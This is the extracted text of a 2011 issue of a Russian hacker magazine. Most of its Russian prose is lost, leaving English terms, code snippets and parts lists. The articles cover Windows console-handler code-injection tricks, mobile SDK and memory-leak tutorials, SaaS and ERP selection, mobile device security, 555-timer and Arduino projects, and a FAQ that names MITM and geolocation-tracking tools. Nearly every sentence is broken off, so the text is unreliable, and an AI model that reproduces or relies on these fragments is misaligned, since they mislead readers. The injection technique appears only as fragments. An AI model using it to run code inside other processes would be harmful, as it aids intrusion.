, MSDN!
INFO
info

?
IDA
Pro WinDbg

!
AllocConsole();
SetConsoleCtrlHandler( threadHandler1,TRUE );
SetConsoleCtrlHandler( threadHandler2,TRUE );
GenerateConsoleCtrlEvent( CTRL_C_EVENT,
GetCurrentProcessId() );
//
threadHandler2(CTRL_C_EVENT)
//
107
CODING
threadHandler1(CTRL_C_EVENT)
SetConsoleCtrlHandler( threadHandler1, FALSE );
SetConsoleCtrlHandler( threadHandler3, TRUE );
GenerateConsoleCtrlEvent(CTRL_BREAK_EVENT,
GetCurrentProcessId());
//
// threadHandler3(CTRL_BREAK_EVENT)
//
// threadHandler2(CTRL_BREAK_EVENT)
FreeConsole();
, ? .
:).
, API- AttachConsole

. ,
,

.
,
.
API-
AttachConsole CreateRemoteThread!
, :
;
;
AllocConsole();
AttachConsole();

SetConsoleCtrlHandler( threadHandler, TRUE );

GenerateConsoleCtrlEvent(CTRL_BREAK_EVENT,
GetCurrentProcessId());

threadHandler.
:
CTRL_C_EVENT , CTRL_BREAK_EVENT. ,
GenerateConsoleCtrlEvent
,
.
,
winsrv!SrvAllocConsole
CtrlRoutine PropRoutine.
CtrlRoutine ,
PropRoutine? PropRoutine
. , ,
. ,
,
.
, , (
winsrv!ConsoleWindowProc)
:
uMsg = WM_SYSCOMMAND
wParam = 0xFFF7
lParam = undefined
?
: NtCreateSection,
108
NtMapViewOfSection,
.
NtUnmapViewOfSection, NtDuplicateObject,
(
!)
CreateRemoteThread
PropRoutine .
, PropertiesDlgShow , winsrv!ConsoleWindowProc
.
,
- ,
PropertiesDlgShow.
? , :
- ,
, DLL ,
LoadLibraryW, (!) , ,
(
! . ) .
console.dll ,
.
, kernel32!PropRoutine,
API- CreateThread(Ex).

AllocConsole/AttachConsole , ,
AllocConsole().
, ,
:
SendMessage (hConsole, WM_SYSCOMMAND, 0xFFF7, 0)
hConsole HWND,
GetConsoleHandle().
?
kernel32!CtrlRoutine ,
, kernel32!PropRoutine
, . , ,
,
.
console.dll, , .
Windows XP console.dll
, ,
. Windows Vista

. ,
Windows , - .
console.dll \system32\, . .

! , ,
.
? , ,
,
! ... ][ ! ,
! z
X 05 /148/ 2011
CODING
herfleisch (perechnev.com)

iOS, Android, Bada, Symbian WM
AirPlaySDK
, , .
- , ,
. , ,

.
?
Ideaworks Labs AirPlaySDK.

C++
iPhone
OS, Android, Samsung Bada, Symbian, Windows Mobile, BREW, Palm/
HP WebOS Maemo. , ? , AirPlaySDK
(, )

. AirPlaySDK
airplaysdk.com , a Indie-
99$.
110
AirPlaySDK Windows Mac OS,

Visual Studio ( 6.0)
XCode . Visual Studio,
, XCode .
, AirPlaySDK Visual Studio. "HelloWorld" - .
.
HelloWorld.mkb
HelloWorld, ,
:
X 05 /148/ 2011
DVD
dvd
HTTP://WWW
links

AirPlaySDK
,
:
airplaysdk.com.

HelloWorld.mkb
options {
s3e-data-dir="data"
}
files {
(source)
HelloWorld.cpp
HelloWorld.h
HelloWorldMain.cpp
}
subprojects {
iw2d
}
s3e-data-dir options
,
. ,
- . data
HelloWorld. files
. source,
. :
HelloWorld.cpp, HelloWorld.h HelloWorldMain.cpp.
subprojects , .
Hello World!
, , .
HelloWorld.mkb
AirPlaySDK. ? , Visual Studio.
HelloWorldMain.cpp ,
HelloWorldMain.cpp, , .
HelloWorldMain.cpp
#include "s3e.h"
#include "HelloWorld.h"
X 05 /148/ 2011
int main() {
GameInit();
while (true)
{
s3eDeviceYield(0);
s3eKeyboardUpdate();
bool result = GameUpdate();
if ((result == false) ||
(s3eKeyboardGetState(s3eKeyEsc) &
S3E_KEY_STATE_DOWN) ||
s3eKeyboardGetState(s3eKeyLSK) &
S3E_KEY_STATE_DOWN) ||
(s3eDeviceCheckQuitRequest()))
break;
GameRender();
}
GameShutdown();
}
#include s3e.h
AirPlaySDK,
. GameInit() .
,
,
.
s3eDeviceYield(..)

.
,
, . s3eKeyboardUpdate()
,
-
. GetUpdate()
.
.
,
Visual
Studio :
dreamspark.com.
INFO
info

AirPlaySDK

,
GPS, , , ,

.
WARNING
warning
,
.

,
,

][ :).
111
CODING
HelloWorld-
,
. true, , false, , , . ,
,
,
( ).
. GameRender(), ,
. , , GameShutdown() (
) ,
, .
, . , HelloWorldMain.cpp . ,
AirPlaySDK.
, .
HelloWorld.cpp HelloWorld.cpp:
HelloWorld.cpp
#include "Iw2D.h"
void GameInit() {
Iw2DInit();
}
bool GameUpdate() {
return true;
}
void GameRender() {
Iw2DSetColour(0xFF000000);
Iw2DFillRect(
CIwSVec2(0, 0),
CIwSVec2(Iw2DGetSurfaceWidth(),
Iw2DGetSurfaceHeight())
);
Iw2DSetColour(0xFF00FF00);
Iw2DFillArc(
CIwSVec2(Iw2DGetSurfaceWidth()/2,
Iw2DGetSurfaceHeight()/2),
CIwSVec2(30, 30),
0, 0x800 * 2
);
Iw2DSurfaceShow();
}
void GameShutdown() {
Iw2DTerminate();
}
112
AirPlaySDK
, HelloWorld.cpp ,
. .

.

HelloWorld.h,
main(). :
HelloWorld.h
#ifndef HELLOWORLD_H
#define HELLOWORLD_H
void
bool
void
void
GameInit();
GameUpdate();
GameRender();
GameShutdown();
#endif
. ,
, F5 Visual
Studio. , AirPlaySDK.
, AirPlaySDK . GCC (ARM) Release

F5.
Airplay System Deployment Tool. ARM GCC Release
Next.
, Next . -
,
. Bada,
Deploy All .
AirPlaySDK . ,
,
! z
X 05 /148/ 2011
CODING
deeonis (deeonis@gmail.com)
memory leaks
,

TLS
, . -.
. ,
C++ MSVC.
Windows,
Microsoft.
,
, . , .
exception delete.
, ,
, .
:
.

( ), - ,
Debug CRT.
Debug CRT
Debug CRT
Debug Heap Alloc Map.
:
Debug CRT
#ifdef _DEBUG
#include <crtdbg.h>
#define _CRTDBG_MAP_ALLOC
#endif
new
malloc()
_CrtMemBlockHeader.
, ,
.
, .
_CrtMemBlockHeader
typedef struct _CrtMemBlockHeader
{
114
struct _CrtMemBlockHeader * pBlockHeaderNext;

struct _CrtMemBlockHeader * pBlockHeaderPrev;
char* szFileName;
int nLine;
size_t nDataSize;
int nBlackUse;
long lRequest;
unsigned char gap[nNoMansLandSize];
unsigned char data[nDataSize];
unsigned char anotherGap[nNoMansLandSize];
} _CrtMemBlockHeader;
,
_CrtDumpMemoryLeaks(). ,
. , ,
,
. :
_CrtDumpMemoryLeaks()
Detected memory leaks!
Dumping objects ->
{163} normal block at 0x00128788, 4 bytes long.
Data: < > 00 00 00 00
{162} normal block at 0x00128748, 4 bytes long.
Data: < > 00 00 00 00
Object dump complete.
: Microsoft Visual C++ 6.0 crtdbg.h

new, , .
__FILE__:__LINE__
crtdbg.h file line 512.
Microsoft ,
.
:
new
#define new new( _NORMAL_BLOCK, __FILE__, __LINE__)
X 05 /148/ 2011
Visual Leak Detector

- crtdbg.h.
- .
: _CrtSetReportMode _CrtSetReportFile. _CrtSetReportFile -
stdout.

_CrtSetReportMode( _CRT_WARN, _CRTDBG_MODE_FILE );
// stdout
_CrtSetReportFile( _CRT_WARN, _CRTDBG_FILE_STDOUT );
, , .
, , -
. -
_CrtDumpMemoryLeaks(). :
_CrtDumpMemoryLeaks()
int _tmain(int argc, _TCHAR* argv[])
{
_CrtMemState _ms;
_CrtMemCheckpoint(&_ms);
// some logic goes here...
_CrtMemDumpAllObjectsSince(&_ms);
return 0;
}
X 05 /148/ 2011

_CrtMemCheckpoint(), , _CrtMemDumpAllObjectsSince(), ,
, .
, Debug CRT,
. ,
, .
Visual Leak Detector
Visual Leak Detector ,

Debug CRT, .
vld.h .
.
-, (DLL EXE), include vld.h . ,
module_1.dll
module_2.dll, #include <vld.h>
module_1.h module_2.h.
-, Visual Leak Detector
.
, stdafx.h .
-,
.
Visual Leak Detector .
vld.ini, , , VLD. ,
115
CODING
Valgrind
.
Visual Leak Detector . ,
. ReportTo.
debugger, file both.
, .
,
ReportFile.
ReportEncoding: unicode ASCII.

(SelfTest). , . ,
output - :
ERROR: Visual Leak Detector: Detected a memory leak
internal to Visual Leak Detector.
VLD ,
, ,
. ,
, .
Visual Leak Detector ,
.
Valgrind
, , Windows
MS Visual Studio. . Valgrind .
Linux Mac OS X
, (
116
). , Valgrind
, JIT-.
, . Valgrind.
, , .
Valgrind .
( 4-5 ) . .
, Valgrind . Memcheck.
C . Memcheck , /
, .
, Addrcheck , Memcheck.
Helgrind DRD
. , Valgrind ,
.

.
. ,

memory leaks. z
X 05 /148/ 2011
1.
, ,
shop.
glc.ru.
2. .
3.

:
e-mail: subscribe@glc.ru;
: (495) 545-09-06;
: 115280, ,
. , 19, ,
5 ., 21,
, .
! , .
.
,

500 .
12 2200 .
6 1260 .
,
!

+ + 2 DVD:
162
( 35% , )
12 3890 (24 )
6 2205 (12 )
? info@glc.ru
8(495)663-82-77 ( ) 8 (800) 200-3999 ( ,
, ).
SYN/ACK
grinder (grinder@tux.in.ua)
SaaS

, IT- .
( ) -,
. , , , , .
SaaS?
. M- , . ,
. , , . ,
(, , )
,
,
. , , , , .

, CRM, ,
. , IT-,
,
. , ,
. . ,
CRM-,
. .
,
, ,
. , ,
. VPN
,
, .
- ,
- . , , ,
.
(SaaS, Software
as a Service) .
,
.

, , ,
.
( , ).
,
, .
, SaaS,
118
.
, SaaS,
.
, .
, ,
. ,
,
. ,
.
, , .
. (pdd.yandex.ru). ( , .) MX-
. . ,
. POP3/IMAP, -
.
., .
. 1000 ,
( - ),
. , .
, ,
.
, . Google Apps (google.com/apps/
intl/ru/business) GMail
,
, , , Google.
2 .
, GMail. .
(50$ ) 25 ,
, ,
Gmail, API-, -. ,
Postini, ,
TLS, ,
, . . ,
X 05 /148/ 2011

Google Apps. ,
API, Google Apps Marketplace (google.
com/enterprise/marketplace).
Google Apps.

,
, ,
, , VoIP
. API , ,
. ,
Apps Marketplace .
.
NextMail (nextcorp.ru), is-mail.biz
.
,
, .
( )

.
.
Talent management HCM (Human Capital Management)

.

. SaaS
Taleo (taleo.com)
SuccessFactors (successfactors.com).
,
, , .

Facebook LinkedIn (linkedin.com),

. LinkedIn

, 85 000 000
.
X 05 /148/ 2011

.

,
.
.
,
:). Dr.Web AV-Desk (drweb.com/saas/find_provider/
biz), Kaspersky Subscription Services (kaspersky.ru/kss),
Outpost AV Service (agnitum.ru/purchase/av-service)
ESET NOD32 (esetnod32.ru/.solutions/isp/list).
, , . Windows
. ,
. , Dr.Web x86 ,
, -,
,
. ,
, 2011, Kaspersky Internet Security 2011
Kaspersky CRYSTAL
.
,
.
,
, , , .
- McAfee, F-Secure
Panda web-
.
Panda Panda
Cloud Antivirus (cloudantivirus.com/ru),
.

, , ,
, .
INFO
info
CRM

][
04.2011.
119
SYN/ACK
Cisco WebEx

Panda Cloud Protection (cloudprotection.pandasecurity.com), Panda Cloud Office Protection, Panda Cloud
Email Protection Panda Cloud Internet Protection.
, -
. .
Panda Cloud Office Protection . , , , /IM HTTP/FTP-;
, IDS,
, HIPS. Panda Cloud
Antivirus. -, Panda Cloud Office Protection
. , . ,
, .
F-Secure Protection Service for
Business (f-secure.com/en_US/products/business/security-as-aservice/) McAfee SaaS Endpoint Protection (mcafeeasap.com/SC).
Cisco Webex

.
,
. , .
-, . Cisco,
2007 Webex, Cisco Webex
(webex.com), - . , Cisco Webex
50% . , ,
, , ,
(IM, , VoIP, ). , , , .
MS Office
.
iGoogle ,
,
.
120
Google Apps
Marketplace
, URL,
Meeting Center.
,
. : 640x360@30fps.
. , .
Webex
, -. (BlackBerry, Symbian, Windows Mobile Apple iOS).
, , ,
.
,
$49 ,
25 .
Cisco Webex Adobe Connect
(adobeconnect.ru), Microsoft Office Live Meeting (microsoft.com/online/
office-live-meeting.aspx), Skype .
Citrix GoToMeeting
(gotomeeting.com), 2004 . -,
( VoIP),
. ,
,
X 05 /148/ 2011
Panda Cloud Office

Protection
CRM NetSuite
.
GoToMeeting ( 15 ), GoToWebinar
( 1000 ) GoToMeeting
Corporate.
CRM ERP
,
CRM (Customer Relationship Management System,
). CRM ][ 04.2011.
,
, SaaS
. ,

, , . - (
), ,
. SSL. - ,
. , SaaS , .
Gartner SaaS,
CRM . ,
SaaS CRM . NetSuite CRM
(netsuite.com), SaleForce (salesforce.com) (megaplan.
ru). , NetSuite CRM 2009
Gartner -20 CRM- ,
SaleForce . SaaS, , CRM ,
.
SaaS
. , NetSuite CRM
: , ,
,
, ,
. CRM+
, , , ,
.
-, , , . CRM+
CMS, -,
CRM. , X 05 /148/ 2011

CRM.
smbXML (Small
Business Extensible Markup Language) -. NS-BOS,
, NetSuite.
, NetSuite ,
SaaS ERP ( (PSA), ), OneWorld (ERP
,
), OpenAir
myDIALS.
NetSuite, CRM,
,
-,
.
, CRM .
SaaS-, BigMachines
(bigmachines.com) .
BigMachines CRM- ERP-.
() . ,
, ,
, - . z
121
SYN/ACK
(polygaev@gmail.com, ICQ 284491726)
ERP -

-?
hardware- software- , . ,
, ,
.
, - , ERP-.
ERP: ERP- (. Enterprise Resource Planning System,
) ( ,
, - ).

(-)

. , ,
, ERP- .
ERP-,

.
, , ERP-
.
ERP

( -)
.
, .
:
-.
, ERP ,

ERP-. ,
- ( ) (,
-). ERP
- .
, ,
ERP-,
,
. , , , - N ERP-.
,
:
,
;
122
, ,
( );
: ( ), ( N M), ( N M);
- , ,
ERP,
, : ,
N
ERP-.
ERP: ,
( , , ERP ).
:
, , ,
;

ERP ;
,
ERP,
.
. ( ) 34,
. ,
80- ,
.
.
ERP .
. scope
,
-, .
- 1,
- SAP. ,
, , -,
,
. .
X 05 /148/ 2011
,

. Excel ,
-, . ,
ERP .
, ERP:
, ROI Return of Investment.
,
,

(
) ,
Unixoid ,
, -
, , .
, , ?
.
? :) ,
,
: lozovsky@glc.ru. , -
(http://group.xakep.ru) .
, .
, ,
.
,
, ,
.
CBA Cost-Benefits Analysis. .
, .
. .
1. , .
.
. .
2. , CBA
,
, .
,
, .
.

, ,
. , Microsoft Rapid Economic
(
- CBA-, REJ
,
/ -
X 05 /148/ 2011
123
SYN/ACK
, ERP
Justification (REJ).
:
1. -.
2. .
3. .
4. .
5. .
6.
.
Microsoft,
,

.
.
,
, ,
.
- , .
, , ,
. ERP -,
, . ,
.

. ,
. :
( , ),
,
- .
-
.
124
ERP
.
,
.
,
, ,
ERP.
, -,
,
,
. ,
-, , .
:
( ) N

ERP .
, Order processing.
(, -)
: , ERP-, ,
, ERP-.
, ERP-
. ,
:
-, ,
(, , ).
, :
ERP- ;
ERP- ,
(,
, ,
X 05 /148/ 2011
HTTP://WWW
links
ERP

: onsult.ru.

CBA:
http://goo.gl/7Bhn8.
Build an airtight
business case for new
IT investments:
http://goo.gl/UE08K;
Magic Quadrant
for Midmarket and
Tier 2-Oriented ERP
for Product-Centric
Companies:
gartner.com;
ERP 2009
,
);
ERP-
ERP- EDI (,
e-Cod).
. ,
, -,
,
.
ERP-,
, , :).
.

ERP-.
SAP.
-,

, ,
. SAP CRM.
ERP
long list .

,
X 05 /148/ 2011
ERP-.
:
. , ,
,
.
,
long list
. long list
( ,

). , long
list . ,
,
,
.
:
, ,
.

ERP-
2009 :
http://goo.gl/J57UC.
ERP .
long list,
.
ERP-.
excel-,
:
, , -
125
SYN/ACK
.
2-4 .
RFP Request for
Proposal ( ), . , , .
, , -
. short list.
short list
.
- ( Ca-Plus
Business solution)
.
, . ,
: ,
, ,
. -
( ,
), - (, , ).

ERP-.

long list,
.
.
, ,
ERP , /
.
:
1. ,
,
.
2.
,
. ,
,
, ,
.
3. ,
. -,
. ,
.
4. ,
, . .
long list short list
,
-
126
.
,
, ,
.
. , - , - .
, ,
, . , short list SaaS, ,

( , ),
, 5-7 .

,
.
. , .

,
.

. .
(,
, )
.
, ,
-
ERP-. :
;
;
;
ERP,
;
long list;
, short list;

;
;
.
,
. ,
. z
X 05 /148/ 2011
SYN/ACK
, , Group-IB
. ,
.
, .
, VPN, flash
java-script, , , .
,
.
BlackBerry,
, ,
.
, . Windows Mobile, Android, iOS, Symbian,
. ,
, .

, .
,
.
,

. ,
, .
1. .
,
,

, , .
2. -.
Skype, Icq, Jabber
,
, - .
3. , .
DropBox
- ,
.
, usb-,
.
,
, -. ,
.
4. .
.
X 05 /148/ 2011
5. .

VNC, TeamViewer
.
VPN.
, .
6. .
,
, sms-
. ,
.

.
-
,

.
, ,
. ,

.

, .
WindowsMobile
. 5.0 6. , -
. 6.0
. ,
.
. (Kaspersky
Endpoint Security for Smartphone, Dr.Web Enterprise Security Suite,
McAfee Mobile Security for Enterprise, Symantec Mobile Security
Suite for Windows Mobile, ESET NOD32 Mobile Security, GuardianEdge
Smartphone Protection).
,
, ,
127
SYN/ACK
2010 .
.
GuardianEdge DLP-.
ActiveSync Exchange Server
. Exchange Server
,
, - .
, ,
,
. .
Windows Phone 7 (WP7) , .
SymbianOS
Nokia WP7, Symbian
. Nokia
sis- . ,
. ,
. Java-
sis- ( , ), ,
,
, .
,
, Exchange ActiveSync (EAS) policies,
.
,
(Symantec Mobile Security for Symbian, Kaspersky Endpoint Security for
Smartphone, ESET NOD32 Mobile Security),
Windows Mobile .
,
installserver, .
,
, , , .
. Nokia ,
128
. 2-2,5 ,

.
iOS
Apple. (3gs
) . EAS,
Apple Push Notification
Service, .
Apple
Store .
(GuardianEdge Smartphone Protection, Panda Antivirus for Mac, Sophos
Mobile Control). Panda , iOS-, Mac.
Sophos , ( , 2011 . .). , Symbian,
- Jailbreaka.
iOS
.
Apple
.
AndroidOS
, Google,
. 1.6 Exchange Activesync,
. EAS (, ) . .
(McAfee WaveSecure,
Trend Micro Mobile Security for Android, Dr.Web Android, Kaspersky).
Android Market,
. Android , ,
,
(, X 05 /148/ 2011
Nielsen, ,
2011 . .
,

. .).
, , Symbian iOS, ,
root. root
. ,
.
, ,

, .
, , . -

, . ,

.
1. .
, . ,
.
( ),
.
2. .
,
, .
3. .
, .
, .
4.
.
,
. -. ,
.
X 05 /148/ 2011
5. , .
,
Windows Mobile ,
. , .
6. Exchange ActiveSync
, ,
( ),

.
7. .
,
( VPN, ),
( IPSEC,
).
/
, .
8. , .
.
, ,
, .
,
( ) ,
.
,
, Exchange-
EAS.
BlackBerry OS ( ), ,
. z
129
PHREAKING
(po@kumekay.com)
555
5 555
555
. -
, , 555
.
(555contest.com), .
: , , .
$1500.
,
555; ; ; , ; ,
.
, 555 ,
. ?
, ,
,
, . .
1. . ,
.
2. , .
(Vcc) , ,
, .
3. .
( ). 2
130
, , (
0,5 ), . ,
200 .
, .
4. . ( 0,7 ),
, .
, ,
(, ).
5. . , ,
. , ,

10 .
6. , . 2/3 Vcc,
.
, .
7. . ,
, ,
. 200
.
8. . . 4,5 16 .
9-, USB
X 05 /148/ 2011
1. .
,
,
. ,

, .

t=1,1*R1*C4.
,
, .
, C4=100 R1=2,2
4 .
:
0,000001 15 .
, .
2. .
3. .
- ,
, t1, ,
t2, . ,
ASCII-
: ____. ,
, RC- (
R2, R3 1) f = 1,44/((R3 + 2R2 )C1).
t1 = 0,693 (R3 + R2)C1
,
t2=0,693(R2)C1 .
.
,
.
, .
, ,
,
. ,
,
sureelectronics.net,
: .
, !
1: . ,
,
.
? -, 555 (
IC1). ,
DIP
. ,
. , ,
X 05 /148/ 2011
,
NE555N.
, 556 558,
2 4 .
,
. -, : C1 5
10 C3 10 .
: (LED1)

(R5) 300-600 ( 470 ),
, R1 1
C1
10
C2
100
C3
10
IC1
NE555
LED1
R1
R2
10
R5
470
S1
131
PHREAKING
R2 10 .
( ,
). C2 100 ,
.
(,
), ,
.

,

.

, .
C3,
, .

, ,
, , .
.

. ,
.
555
: ,
,
1
4, 5 8.

,
. ,

, , .
,
, .
,
,

, . , ,
.
.
.

, , .
,
,
USB-
, , .

,

.
,
( ), ,
:
USB,
, .
,
,
.
(, )
. ,
.
,
,
.
, ,
,
.

.
,
C4 ,
132
.
, 10 , ,
,
100 , .

.
( ) ,
4.

, ,
RC- . C1 100 , R2
1
R3 10 .
3 ,
,
.

R3.
, ,
.
.
X 05 /148/ 2011
.
555
. , ,
. ( )

//,
,
.
.
DealExtreme (s.dealextreme.com/
search/servo),
. ,
.
- :
, SERVO-3
, SERVO-1,

SERVO-2.
,
50
0,9 2,1 , ,
. RC-
,
.
,
,
D1. 1n4148,
,
.
.
555 , 15
, .

4,8 6 .
9 ,
. 7805,

5 . ,

. , ,
,
, . :

,

, ,
+5 .
,
,

.
C1
22
C2
100
C3
10
D1
1n4148
IC1
NE555
IC2
7805
R1
R2
56

R3
100
SERVO
C1
10
C2
100
C3
10
IC1
NE555
LED1
,
, : ,
, .
555.
X 05 /148/ 2011
,
.
,

R1
10
R2
10
R3
100
R4
R5
470
S1
T1
2N3904
133
PHREAKING
, R4 T1. ,

, , 200 ,
555, .

NPN- 2N3904, -
200 ,
, ,

- , IRF630,

9. ,
12 , .

,

3-6 ,
.

linux, ,
. ,
,
, . , ,

. :
,
!
555. (,
) 4
,
, .
IC2 . .
.

3 ,
LED2 (
, ,
134
).
S1, , 3 , LED1, ,
LED2 -, - ,

. ,
C4 R1.
6 2/3
Vcc, .
, R1
500 ,

.
, . instructables.com.
555
Timer Pro schematica.com/555_Timer_
design/555_Timer_PRO_EX.htm,

(,
$29, ,
). z
C1
10
C2
100
C3
10
C4
100
C5
10
IC1
NE555
IC2
NE555
LED1
LED2
R1
2.2
R2
10
R3
10
R4
470
R5
470
R6
10
S1
SP1
X 05 /148/ 2011
PHREAKING
(po@kumekay.com)

Arduino
,
, . , .
. , .
, . , ,
, , ,
, .
,
(, )
, ,
, .
. ,
,
, .
, .
:
1. ,
;
X 05 /148/ 2011
2. , ;
3. (
- , );
4. , , ,
;
5. , , .
.
: ,
- .
, ,
, 12
.
20 ,
. .
, .
,
. ,
135
PHREAKING

: , , .
8-10 60 ,
.
0,03 2 ( 0,2 ),
, ,
.

.
. -
, , 500 ,
. -
, , ,
. ( )
,
- , ! , ,
. , , (
) , 20-30
. ,
.
12 : , .
ATX . , ,
,
- (
), . ATX ,
20- ,
,
+12 , . ,
-
136
D1
1N4007
D2
1N4007
IC1
SS59E
IC2
SS59E
L1
Q1
- IRL530N
R1
10
R2
100
R3
10
T1
2N3904
U1
ARDUINO
, .
12- . , .
, , ,
, 1 . ,
.
npn-,
- . ( MOSFET) N-,
, . -
,

(
X 05 /148/ 2011

100 ). -
5 , ,
, . IRL530N
, 17 100 . , (, IR F630M),
12 .
, . 2N3904,
npn-.
: ,
, , - ,
.
,
( 1n4007) ,
, ,
,
. , , , , .

, .
( ) , - ,
, ,
. ,
X 05 /148/ 2011
,
,
. , ,
. , .
( ) (
) . , . , , ,
( )
.
. -
!
: ,
,

, ,
.
.
.
,
.
!
, ,
.
,
, 400-1000 .
137
PHREAKING
-
,
.

SS59E,
SOT223 ( ), , . to92 ( SS19,
SS49 SS495A). ,
. CD/DVD,
Bornimago http://s.dealextreme.com/search/magnets,
.
. . :
, , , ,
. .
.
, , . ,
,
,

.
,
.
. , ,
,
138
, , ,
.
Arduino, . Arduino Diecimila,
Duemilanove, Uno .
,
, ,
. ,
,
.
,
. D1
L1, D2
MO- Q1.

( ),
. IRL, Q1
R3 R2 D10 Arduino (
-). TO220 (
) : 1 (), ; 2 () , 3 ()
.
+12 .
Arduino - , 12- , ,
c
2,1 , 5,5 .
X 05 /148/ 2011
USB , .
. IC1 IC2 A0 1, VCC +5 , GND
. IC1 , IC2
( ,
-). .
10 ( ).
3 : +5 ,
A2.
- .
.
, , , , , . ,
, .
Arduino.
, , .
,
,
. , .
1
const int in1 = A0; // 1
const int out1 = 10; // () .
int s1 = 0;
// 1
int s2 = 0;
// 2
int o1;
//
void setup() {
//
//Serial.begin(9600);
}
void loop() { //
//
analogWrite(out1, 255 ); //
//
delay(15); // ,
s1 = analogRead(in1); //
o1 = s2 -s1; //
Serial.print("magnet on: s1 = "); //
//
Serial.print( s1 );
Serial.print(" s2 = ");
Serial.print( s2 );
Serial.print(" delta = ");
Serial.print( o1 );
analogWrite(out1, 25 ); //
// , 10%
delay(15); // ,
o1 = s2 -s1; //
Serial.print("magnet off: s1 = "); //
//
Serial.print( s1 );
Serial.print(" s2 = ");
Serial.print( s2 );
Serial.print(" delta = ");
Serial.println( o1 ); //
delay(1000); //
}
X 05 /148/ 2011
,
( ).
,
- , . Arduino -.
(PWM, - )
, .
, , -
, ,
.
10% 100% .
, .
: , ,
( , ) . ,
,
,
, , . ,
, !
2
const int in3 = A2; //
const int d10 = < >;
// 10%
const int d100 = < >;
// 100%
const int out1 = 10; // () .
int
int
int
int
s1
s2
s3
o1
=
=
=
=
0; //
0; //
0; //
255;
// ,
//
int d = 0; //
int v;
//
void setup() {}
void loop()
{
//
d = map (o1, 25, 255, d10, d100); //
v = abs (s1- s2) +d ; //
o1 = map (v, 0, 1024, 25, 255); // ,
//
analogWrite(out1, o1); //
// .
delayMicroseconds(100); // ,
//
, , ,
.
, -
, , !
,
, .
! , zeltom.com/emls.aspx
. ! z
139
UNITS
faq
united?

faq@real.xakep.ru
Q:

. .
, ,
, : SQL
Injection, XSS . ,

?
A: ,
,
, OWASP Top
10 (owasp.org/index.php/OWASP_Top_Ten_
Project).

-.
:
A1: Injection;
A2: Cross-Site Scripting (XSS);
A3: Broken Authentication and Session
Management;
.
( )

.
,
140
, ,

: (bit.ly/
xakep_trainings). Mutillidae (bit.ly/Mutillidae).
OWASP Top 10.

,

. ,
.

XAMPP-. ,

.

Passive DNS query tool
(code.google.com/p/passive-dns-query-tool).
RubyGems:
gem install passive-dns
. ,
ISC
API-,
(
dnsdb@isc.org). DNSParse,
.
:
./pdnstool.rb <ip|domain|cidr>
Q: - , DNS
?

zdes_byla_malware.cc
DNS
?
A: ,
DNS:
DNSParse, ISC, BFK.de CERTEE.
Q: ,
.
?
A: LoadOrder (technet.microsoft.
com/ru-ru/sysinternals/bb897416). 2006 ,
.
X 05 /148/ 2011
LESS ,

Hatkit Proxy
DEP/ASLR

,
.
Q: -
, ,
,
?
A: .

, ,
,
. Java- (bit.ly/reveal_pass),
.
.
.
Q: , .
,
,
. !

,
100%
. .
?
A: ,
: .htaccess (
)
cgi-bin.
cgi-bin htdocs .

. ,
php.ini, :
auto_append_file = "/home/user/USER/
cgi-bin/security.cgi
X 05 /148/ 2011
PHP-
security.cgi, .
,
, .
Q: , DEP ASLR?
, , -,
,
,
- ?
A: Microsoft
EMET
Enhanced Mitigation Experience Toolkit (bit.ly/
EMETpage).
GUI-,
, DEP/ASLR, .

DEP, SEHOP,
ASLR, HeapSpray EAF. ,

( ) .
Q:
-
Python.
A: ,
web.py (webpy.org), cherry.py (cherrypy.
org), Django (djangoproject.com), Tipfy (tipfy.org)
Flask (flask.pocoo.org). ?
Flask,
-
:
from flask import Flask
app = Flask(__name__)
@app.route("/")
def hello():
return "Hello World!"
if __name__ == "__main__":
app.run()

:
$ easy_install Flask
$ python hello.py
* Running on http://localhost:5000/
, -
5000 .

web2py (web2py.com).
,
Python ( ), - SSL, SQLite,
, - (
web2py.
com/demo_admin/default/site).
,
,
. -
:
def index():
return "Hello World!"
Q: ,
?
A: tcpdump
Maemo,
Nokia N900. . ,
tcpdump Android. ,

Packet Sniffer (sites.google.com/
site/androidarts/packet-sniffer). ,

jailbreak, . ,
,
( Wi-Fi Bluetooth)
. iPhone , pirni (, ,

Cydia). ,

141
UNITS
. ,
, ,
Wireshark (wireshark.
org) .
Q: ,

.
?
A:
, , screenr.com. ,

. .
Windows,
Mac. , ,
API,

.
Q:
.
, .
?
A:
, , ,
. ,
,
.

.
Yahoo! YSlow (developer.yahoo.com/yslow).
Yahoo
Firefox,

Firebug. Yslow : ,
, -
Document
Object Model (DOM),
.
,
JavaScript-

Smush.It.
Web Page Test (webpagetest.org).

AOL ,

. Web Page Test

.
PageSpeed (code.google.com/speed/pagespeed).
, YSlow, -
142
Firefox/Firebug.
- Page
Speed
-
.

.
. <script>,
. ,

(,
),
,
. ,
,
, ,
.
2-3 .

, .
yepnope (yepnopejs.com).
Q: - CSS ? ,

, , ?
A:
, Sass (sass-lang.com)
LESS (lesscss.org). CSS , . ?
: , , ,
LESS, CSS,
.
LESS,
( @):
@the-border: 1px;
@base-color: #111;
#header {
color: @base-color * 3;
border-left: @the-border;
border-right: @the-border * 2;
}
#footer {
color: @base-color + #003300;
}
:
#header {
color: #333;
border-left: 1px;
border-right: 2px;
}
#footer {
color: #114411;
}
CSS .
Q:
Windows x64!
A: Windows 7 x64,

.
,
, virtdbg (code.google.
com/p/virtdbg).
,
Intel (VT-x), .
,
.
,
BSOD.
Q: ,
. ,

(
Foursquare),
. :).
A: , , .
.
, creepy (github.com/
ilektrojohn/creepy). ,

:
;
,

API;
EXIF- .

.
- .
Q:
,
MITM?
,
.
A: Hatkit Proxy
Project (bit.ly/hatkit). :
GUI-, TCP/
HTTP-;

MongoDB

;
HTTP- . z
X 05 /148/ 2011
>Security
Blazentoo 0.1b
BugChecker
Creepy 0.1.9
metasm
narly
Pyloris 3.2
quickrecon 0.2.3
radare2
RainbowCrack 1.5
Scapy 2.2.0
scdbg
>Net
BWMeter 5.4.1
DNSDataView 1.20
FirewallBuilder 4
inSSIDer 2.0.7
Internet Explorer 9
KpyM Telnet-SSH Server 1.19c
LAN Search Pro 9.0.1
NetSetMan 3.2.3
Odysseus 2.0.0.84
OTR localhost AIM proxy 0.3.1
RFIDIOt 1.0a
RogueScanner 2.6.0.0
SIP Inspector 1.31
Swish 0.4.6
TeamSpeak3 3.0.0
ThreatFactor 1.04
TightVNC 2.0.2
Tunngle 4.3.2.0
USB to Ethernet Connector 4.0
VodBurner 1.0.5
>Misc
1Password for Windows 1.0.5
Clavier+ 10.6.1
CodySafe
Launchy 2.6B2
OnTopReplica 3.3
Piles
Preme 0.941
Prey 0.5.3
Prio - Priority Saver 1.99
UltraSearch 1.4
